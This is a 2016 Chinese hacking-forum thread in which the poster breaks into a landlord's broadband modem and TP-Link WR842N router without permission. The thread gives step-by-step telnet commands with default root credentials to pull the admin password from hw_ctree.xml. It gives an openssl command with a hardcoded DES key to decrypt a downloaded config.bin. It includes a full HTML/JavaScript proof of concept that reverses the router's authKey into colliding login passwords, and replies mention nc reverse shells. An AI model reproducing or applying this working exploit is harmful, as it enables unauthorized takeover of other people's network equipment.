局域网 无法反弹提权 干掉 房东路由器
本帖最后由 人=族 于 2016-3-29 09:47 编辑======================
红客联盟&Milw0rm有奖活动
======================
本人比较腼腆最近提权 总是很麻烦 因为我是局域网我又不想 去问房东管理密码 好吧 开始了
目标是 电信光纤猫上面有WiFi 密码猜是tp 一样的脸上去了了
密码怎么办查资料
一.查看网关,打开命令提示符
xp用户:开始-运行-输入cmd-回车
win7用户:同上,要是找不到,请点击开始-所有程序-附件-命令提示符
(实在找不到的话,按住windows功能键+R也可以打开运行对话框)
打开命令提示符
键入ipconfig/all回车
在刚刷过的字符里找到,本地连接,在该项目下查看默认网关default gateway,记录后面数字,一般为192.168.1.1
开启telnet命令: win7下默认是禁用telnet服务的,重启Telnet方法如下:1、控制面板-程序-打开或关闭windows功能,在里面你可以看到许多服务项,选择“telnet服务器”和“telnet客户端”确定打开即可。
打开刚才的命令提示符窗口
键入 telnet 192.168.1.1回车
192.168.1.1为网关
这时会清屏并出现一个新窗口,
出现login继续键入root,然后回车,键入admin,再回车
此时屏幕出现WAP>shell 回车
继续键入 cd /mnt/jffs2
回车,屏幕无明显变化,
继续键入 grep telecomadmin hw_ctree.xml
回车出现好几排字幕,找到
UserName="XXX"。 XXX即为用户名
PassWord="XXX"。 此处为密码
进来了 [
看下配置 玩了 不是在这里拨号
那就是 tp-wr842n 了
去看下能爆破不
坑了 这怎么玩吗
想到刚才 进 光猫的看看 开放了什么端口不
就这两个
用漏洞扫描器试试
也是没有什么信息 我看着密码口发呆 要是有sql 注入就好了 (那是做梦)
看看tp 漏洞很多 但是没找到 tp-wr842n想我一代红客
竟然被局域网难倒了 奇耻大辱
终于一个解决方法
1.漏洞1,任意下载config.bin[路由器配置文件] 例如:**.**.**.**/config.bin
2.openssl enc -d -des-ecb -nopad -K 478DA50BF9E3D2CF -in config.bin
提取配置信息。
3.找到首行
authKey 7WyV06YRw39nwlv
此为加密过的用户后台登陆密码。
4.漏洞2,Query.js存在算法BUG.经过研究这段加密字串“7WyV06YRw39nwlv”通过用户浏览器运算生成,且存在算法漏洞。
5.加密字串虽不可逆,但存在大量碰撞,即任意字符可生成相同的加密字串。破解文件html网页格式【自行转存】。找个数据库软件,用最后生成的SQL脚本【笛卡尔积】生成的每一组字符串均可登录后台。【网页格式,代码部分另存成网页html文件】
poc
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://**.**.**.**/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://**.**.**.**/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>TPLINK_Auth_Key_计算器 作者:青岛小哥 email:qdpp007@**.**.**.**</title>
<script type="text/javascript">
function $(id)
{
return document.getElementById(id);
}
function orgAuthPwd (pwd)
{
var strDe = "RDpbLfCPsJZ7fiv"; /*字符宽度15*/
var dic = "yLwVl0zKqws7LgKPRQ84Mdt708T1qQ3Ha7xv3H7NyU84p21BriUWBU43odz3iP4rBL3cD02KZciX"+
"TysVXiV8ngg6vL48rPJyAUw0HurW20xqxv9aYb4M9wK1Ae0wlro510qXeU07kV57fQMc8L6aLgML"+
"wygtc0F10a0Dg70TOoouyFhdysuRMO51yY5ZlOZZLEal1h0t9YQW0Ko7oBwmCAHoic4HYbUyVeU3"+
"sfQ1xtXcPcf1aT303wAQhv66qzW"; /*字符宽度255*/
$('dspDic').value=dic;
$('dspPwd').value=pwd;
$('dspStrDe').value=strDe;
return securityEncode(pwd, strDe, dic);
}
function securityEncode (input1, input2, input3)
{
var dictionary = input3; /*=255*/
var output = "";
var len, len1, len2, lenDict;
var cl = 0xBB, cr = 0xBB;
len1 = input1.length; /*len1=6~15*/
len2 = input2.length; /*len2=15*/
lenDict = dictionary.length; /*lenDict=255*/
len = len1 > len2 ? len1 : len2; /*密码限定宽度最大15位,len恒等于15*/
for (var index = 0; index < len; index++) /*index= 0 to 14*/
{
cl = 0xBB;
cr = 0xBB;
if (index >= len1) /*如果密码位数=14执行1次,=15不执行,=13执行2次,=12 3,11 4,10 5,9 6...保证取所有密码字符unicode*/
{
cr = input2.charCodeAt(index);
}
else if (index >= len2) /*14>=15,永远不执行!*/
{
cl = input1.charCodeAt(index);
}
else
{
cl = input1.charCodeAt(index); /*取所有密码字符unicode,超出部分取0xBB,补足15位*/
cr = input2.charCodeAt(index); /*cr恒等于:82,68,112,98,76,102,67,80,115,74,90,55,102,105,118*/
}
output += dictionary.charAt((cl ^ cr)%lenDict); /*cl取所有密码字符unicode与cr异或mod 255*/
}
return output;
}
function lgDoSub()
{
var lgPwd = $('pwd').value;
var result;
var strAsc='';
result = orgAuthPwd(lgPwd);
for (var ix = 32 ;ix < 127;ix++) /*32~126可见字符*/
{
strAsc += String.fromCharCode(ix);
}
$('dspAsc').value=strAsc;
$('dspAuthKey').value=result;
$('dspLen').value=result.length;
}
function AuthKeyCup()
{
var arrayPasswd = new Array(15);
var passwdLen=0;
var authkey = $('authKey').value;
var strDe = "RDpbLfCPsJZ7fiv";
var dic = "yLwVl0zKqws7LgKPRQ84Mdt708T1qQ3Ha7xv3H7NyU84p21BriUWBU43odz3iP4rBL3cD02KZciX"+
"TysVXiV8ngg6vL48rPJyAUw0HurW20xqxv9aYb4M9wK1Ae0wlro510qXeU07kV57fQMc8L6aLgML"+
"wygtc0F10a0Dg70TOoouyFhdysuRMO51yY5ZlOZZLEal1h0t9YQW0Ko7oBwmCAHoic4HYbUyVeU3"+
"sfQ1xtXcPcf1aT303wAQhv66qzW"; /*字符宽度255*/
var passwd='';
for(var crIndex=0,passwdList,strComp_authkey,codeCr;crIndex<15;crIndex++)
{
passwdList='';
strComp_authkey=authkey.charAt(crIndex);
codeCr=strDe.charCodeAt(crIndex); /*cr恒等于:82,68,112,98,76,102,67,80,115,74,90,55,102,105,118*/
for(var index=32,strtmp,codeCl,strDic;index<127;index++)
{
strtmp = String.fromCharCode(index);
codeCl = strtmp.charCodeAt(0);
strDic = dic.charAt((codeCl ^ codeCr)%255);
if (strComp_authkey==strDic)
{
passwdList += strtmp;
continue;
}
}
arrayPasswd=passwdList;
}
for(var i=0;i<15;i++)
{
if(arrayPasswd.length==0)
{
passwdLen=i;
break; /*密码长度=i,密码长度=0退出外循环*/
}
else if (i==14)
{
passwdLen=15;
}
}
for(var i=0;i<passwdLen;i++)
{
passwd+=arrayPasswd+'\r\n';
}
$('dspPasswd').value=passwd;
passwd='';
for(var i=0;i<passwdLen;i++)
{
passwd+="drop table t"+i+";\r\n";
passwd+="CREATE TABLE t"+i+"(pwd nvarchar(50) NULL);\r\n";
for(var j=0;j<arrayPasswd.length;j++)
{
passwd+="insert into t" + i + " values('" + arrayPasswd.substr(j,1)+"');\r\n";
}
}
passwd+="select t0.pwd,t1.pwd,t2.pwd,t3.pwd,t4.pwd,t5.pwd,t6.pwd,t7.pwd from t0,t1,t2,t3,t4,t5,t6,t7";
$('dspSql').value=passwd;
// var arrayXH = new Array(passwdLen);
// for(var j=0;j<passwdLen;j++)
// {
// arrayXH=arrayPasswd.length;
// }
// for(var j=0;j<passwdLen;j++)
// {
// for(var k=0;k<arrayXH;k++)
// {
// k*10+
// }
// }
}
</script>
</head>
<body>
<span style="text-align:center">TPLINK_Auth_Key_计算器(新用户界面登录密码演算)</span><br />
<span style="text-align:center">免责声明:本计算器程序(方法)可能带有攻击性,仅供安全研究与教学之用,<br />用户将其信息做其他用途,由用户承担全部法律及连带责任,本人不承担任何法律及连带责任。
</span>
<form action="" method="get"><fieldset><legend>源码测试</legend>
密码[最小6位]:
<input name="pwd" type="text" id="pwd" size="15" maxlength="15" />
<input type="button" name="btnOK" id="btnOK" value="计算KEY" onclick="lgDoSub()" />
<br />
<br />
显示 pwd:
<input name="dspPwd" type="text" id="dspPwd" />
<br />
<br />
显示 strDe:
<input name="dspStrDe" type="text" id="dspStrDe" />
<br />
<br />
显示 Dic:
<textarea name="dspDic" cols="70" rows="4" id="dspDic"></textarea>
<br />
<br />
显示 ASC码表:
<textarea name="dspAsc" cols="70" rows="2" id="dspAsc"></textarea>
<br />
<br />
结果 Auth_key:
<input name="dspAuthKey" type="text" id="dspAuthKey" />
字符宽度:
<input name="dspLen" type="text" id="dspLen" size="5" />
</fieldset>
</form>
<br /><br />
<form action="" method="get">
<fieldset>
<legend>你懂得</legend>
Auth_key【演示字符19830917】:
<input name="authKey" type="text" id="authKey" value="0rZily4W9TefbwK" size="15" maxlength="15" />
<input type="button" name="btnCup" id="btnCup" value="解密KEY" onclick="AuthKeyCup()" />
15位:0rZily4W9TefbwK<br />
<br />
原始密码字符【从首行由上到下,每行任选1个字符对应密码一位,组成密码串,N行字符==N位密码】:<br />
<textarea name="dspPasswd" cols="70" rows="10" id="dspPasswd"></textarea>
<br />
<br />
数据库查询SQL:
<textarea name="dspSql" cols="70" rows="10" id="dspSql"></textarea>
</fieldset>
</form>
</body>
</html>
我的加密 上面也说了 就是 7WyV06YRw39nwlv
解密的
EYst
#w
/=Xp
-0a
%/6IT
1
3
@
qz
Tnq}
.4
c
do
m
.U
我自己组合 没用数据库软件
成功登陆
发到 无线安全 那边去了http://www.08sec.com/thread-8150-1-1.html 我在想提权跟你是局域网有很大的关系么
我是来水经验的…… 不错不错,局域网的思路很清晰 No0d1es 发表于 2016-3-28 23:45
我在想提权跟你是局域网有很大的关系么
nc 不开端口 怎么反弹吗 good 不错不错,这个好! 人=族 发表于 2016-3-29 09:46 static/image/common/back.gif
nc 不开端口 怎么反弹吗
提Linux?
66666666
页:
[1]
2